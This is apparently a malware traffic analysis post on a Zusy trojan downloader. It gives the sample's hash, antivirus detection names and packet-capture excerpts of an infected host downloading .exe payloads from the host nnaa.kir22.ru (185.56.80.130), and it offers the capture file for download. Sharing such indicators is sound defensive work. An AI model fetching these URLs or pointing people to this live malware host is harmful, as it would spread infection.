Zusy Trojan Downloader Dropper Malware Traffic Analysis FULL PCAP File Download nnaa.kir22.ru

Download Attachments

  • 1 pcap 120131
    Date added: January 21, 2017 11:24 pm Added by: admin File size: 89 KB Downloads: 73
SHA256: c4aaea80c893f12bc8f840bdd11eaba545c36ffc8f8fb9d4699aa238b3a679a4
File name: 1201310150340282788.exe
Detection ratio: 49 / 55
Analysis date: 2017-01-21 23:20:20 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Zusy.82257 20170121
AegisLab Troj.W32.Generic!c 20170121
AhnLab-V3 Trojan/Win32.Jackpos.R111286 20170121
Antiy-AVL Trojan/Win32.SGeneric 20170121
Arcabit Trojan.Zusy.D14151 20170121
Avast Win32:Malware-gen 20170121
Avira (no cloud) TR/Jinupd.B.70 20170121
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9790 20170121
BitDefender Gen:Variant.Zusy.82257 20170121
CAT-QuickHeal Trojan.Jackpos.A5 20170121
ClamAV Win.Malware.Jinupd-8 20170121
Comodo UnclassifiedMalware 20170121
Cyren W32/Comrerop.A.gen!Eldorado 20170121
DrWeb Trojan.DownLoader9.22888 20170121
ESET-NOD32 a variant of Win32/Jinupd.B 20170121
Emsisoft Gen:Variant.Zusy.82257 (B) 20170121

 

2017-01-21 01:21:36.334532 IP 192.168.1.102.50570 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150340282788.exe HTTP/1.1
E..[\.@……..f.8P….P5iR…..P…….GET /clients/1201310150340282788.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive

 

2017-01-21 01:22:12.382440 IP 192.168.1.102.50572 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150322509270.exe HTTP/1.1
E..[]A@……..f.8P….P.+rY..!.P….   ..GET /clients/1201310150322509270.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive

2017-01-21 01:22:33.371282 IP 192.168.1.102.50574 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150322065266.exe HTTP/1.1
E..[].@……..f.8P….P./…^.4P…….GET /clients/1201310150322065266.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive

 

Share

Leave a Reply